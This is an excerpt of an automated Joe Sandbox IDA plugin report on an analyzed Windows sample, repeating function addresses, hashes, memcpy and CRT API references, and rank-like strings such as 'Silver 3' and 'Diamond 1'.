Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Gold 1
API String ID: 3063020102-1116304436
Opcode ID: 13633dc04bd729b73bfad360e359c40cbbcf0cbe51484844261775a988218832
Instruction ID: 3bb80fc75c1ad476e608d8097e4ace97f341dfa7079dd7c6f7e660ce0a7c5166
Opcode Fuzzy Hash: 13633dc04bd729b73bfad360e359c40cbbcf0cbe51484844261775a988218832
Instruction Fuzzy Hash: AA82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF78662267F Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Silver 3, xrefs: 00007FF78662267F

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Silver 3
API String ID: 3063020102-3638036111
Opcode ID: 382705a7a427e8fc6eb42cf50dfd285abcf2769609dd69745f8275aef3853014
Instruction ID: 08e1d8de58bc87c9ff0aa822147222c2e7742412e53b3f607e9fc336840e41ca
Opcode Fuzzy Hash: 382705a7a427e8fc6eb42cf50dfd285abcf2769609dd69745f8275aef3853014
Instruction Fuzzy Hash: 2A82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF786622667 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Silver 1, xrefs: 00007FF786622667

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Silver 1
API String ID: 3063020102-920020899
Opcode ID: 7de8baa94a2b5139bd7fc36c1fcf57d6eea0ea34d765e51242e79533c482e765
Instruction ID: e98ffc411f1e436c27657174aebec9e247f07f20bf7f46ce4bc6846f0bb3805b
Opcode Fuzzy Hash: 7de8baa94a2b5139bd7fc36c1fcf57d6eea0ea34d765e51242e79533c482e765
Instruction Fuzzy Hash: 2D82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF786622673 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Silver 2, xrefs: 00007FF786622673

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Silver 2
API String ID: 3063020102-2950641177
Opcode ID: 256c05ba916024294709c92f7e97bb467c8932ce60d4d175e51b59f3b722526a
Instruction ID: 4520b45bfaa62fd3ee7b48b8b20bc94a18b3bcbbd6fdbaded00c188e560baa5a
Opcode Fuzzy Hash: 256c05ba916024294709c92f7e97bb467c8932ce60d4d175e51b59f3b722526a
Instruction Fuzzy Hash: D582F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF78662265B Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Bronze 3, xrefs: 00007FF78662265B

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Bronze 3
API String ID: 3063020102-3389498335
Opcode ID: 4b672e2804f15eaea134c6cd51ef0b6ac787c16fcc7d627ef993df4e7ec87457
Instruction ID: 45fb593ac9b71772abce98a881bb77b92753f1eda0ffd2d061fbfca453e5c3fa
Opcode Fuzzy Hash: 4b672e2804f15eaea134c6cd51ef0b6ac787c16fcc7d627ef993df4e7ec87457
Instruction Fuzzy Hash: 4A82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF78662264F Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Bronze 2, xrefs: 00007FF78662264F

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Bronze 2
API String ID: 3063020102-3170931529
Opcode ID: dbab814025d08f5a63346a91c670f8de48569e9b515047f130df7a9a4a56c434
Instruction ID: e570a2e117f60aa533faa66f798d364dd4275df426335e1244f96d7155970afc
Opcode Fuzzy Hash: dbab814025d08f5a63346a91c670f8de48569e9b515047f130df7a9a4a56c434
Instruction Fuzzy Hash: FC82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF786622643 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Bronze 1, xrefs: 00007FF786622643

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Bronze 1
API String ID: 3063020102-604619507
Opcode ID: 784a189a8e0b0256d503e7cce5ff8cea9137e8d93570346a003d7ee83faaa714
Instruction ID: 48d5bb87fc85616627d33a070a6cea9b6b5c934656facd6a7207a5ea2c49b82f
Opcode Fuzzy Hash: 784a189a8e0b0256d503e7cce5ff8cea9137e8d93570346a003d7ee83faaa714
Instruction Fuzzy Hash: 6182F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF78662270C Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Diamond 3, xrefs: 00007FF78662270C

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Diamond 3
API String ID: 3063020102-2523521028
Opcode ID: 46fab210265880830ab19984097468dc3db615d44e86d4d5ece7f537af17b6d9
Instruction ID: 5d502974779ecd992d5b80333815c9dd89ebc1651bfee0af83fe9f015424f884
Opcode Fuzzy Hash: 46fab210265880830ab19984097468dc3db615d44e86d4d5ece7f537af17b6d9
Instruction Fuzzy Hash: AC82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF7866226FD Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Diamond 2, xrefs: 00007FF7866226FD

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Diamond 2
API String ID: 3063020102-3782135954
Opcode ID: d13cdcc71c72fcc3cc0c6c25b338116d2a39bfa36fcf1b18389b788f3c62f361
Instruction ID: 36cfef8c9322ca2cd7e98fbd6a8c14db7981b09b694a8ab0c6dbee83c92df959
Opcode Fuzzy Hash: d13cdcc71c72fcc3cc0c6c25b338116d2a39bfa36fcf1b18389b788f3c62f361
Instruction Fuzzy Hash: ED82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF7866226EE Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Diamond 1, xrefs: 00007FF7866226EE

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Diamond 1
API String ID: 3063020102-2020049192
Opcode ID: 74257927fbdaa401454e939cbcad83ad7f18b429a0895a0b656e7edb21656777
Instruction ID: 8331c66de58becef451294f0e0f50e2a608cf8270fd51d7e86c2815b6520779e
Opcode Fuzzy Hash: 74257927fbdaa401454e939cbcad83ad7f18b429a0895a0b656e7edb21656777
Instruction Fuzzy Hash: 9282F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF7866226DF Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Platinum 3, xrefs: 00007FF7866226DF

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

